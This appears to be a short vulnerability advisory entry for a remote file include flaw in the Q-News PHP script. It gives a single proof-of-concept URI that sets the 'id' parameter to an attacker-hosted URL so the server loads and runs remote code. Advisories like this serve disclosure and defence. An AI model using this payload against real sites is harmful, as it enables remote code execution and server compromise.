• info
• discussion
• exploit
• solution
• references

Q-News Remote File Include Vulnerability

An exploit is not required.

The following proof of concept URI is available:
http://www.example.com/path_to_qnews/q-news.php?id=http://[attacker_url]